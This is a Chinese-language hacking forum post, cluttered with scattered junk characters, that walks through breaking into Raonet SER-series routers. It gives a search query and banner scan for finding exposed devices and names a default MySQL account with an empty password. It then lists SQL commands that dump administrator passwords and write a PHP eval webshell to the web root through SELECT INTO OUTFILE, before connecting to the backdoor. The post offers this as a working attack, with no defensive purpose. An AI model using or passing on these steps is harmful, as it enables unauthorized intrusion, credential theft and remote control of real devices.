寻找存在漏洞的路由器方法:: i, T1 ~/ }* E3 S7 x
( i8 n/ P* R3 A/ D1:google搜索'Raonet Subscriber Ethernet Router'0 c# {( C% s' M* X% k0 y: t
& G3 o/ @3 S* [3 o2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
( d1 ~4 M3 t6 l" l$ r, w0 q) v# N9 L8 y. e* P
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
" w' X% b$ K2 U8 `9 J
/ c9 \5 `6 a, N; t G9 J3 a$ B//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
5 C/ E; J1 _& A3 y
1 X! b* ~) I' p$ ?
" a) h$ P4 F) ?* G8 W% V, j2 b0 }
入侵步骤:9 ~- v6 e" q6 A% ]9 g8 |! q$ ?
7 N1 V8 v5 @0 Q. [
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php; z# \' p1 ~, D3 E, ]/ |8 Q
) h% U2 g0 T& a; _9 r/ v
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
1 G; P& q1 C ~1 e3:得到密码后连接,查看GUI管理密码:
" u3 u' O) u4 K$ R0 m% J9 yuse ser_5007 _2 ?7 j4 d, v# R- W
select id,passwd from user;
. Q- H4 N% q' c: L. n' z4:通过数据库写入webshell,执行命令:; o# @: I- l) |" R. A8 a
use mysql;
" ]9 E& z" P" O) x. @6 s1 H4 p0 {create table ok(cmd TEXT);
n" `4 P5 h2 ~5 Winsert into ok values("<?php @eval($_POST[cmd])?>");
. l- f9 `7 \+ n$ C" I9 u3 Nselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";$ t) X4 y0 l% V$ Q2 S. [
drop table ok;
8 ^* A2 I! Q1 q1 ^: ^1 s# p" n: U( |% k
5:连接后门shell.php 1 b' O, p0 ~# i2 {) O
' u- o y% H3 W4 U5 B6. 搞定!
' K4 C* _1 }9 ?) s& w% |$ O+ k$ m. W, {
|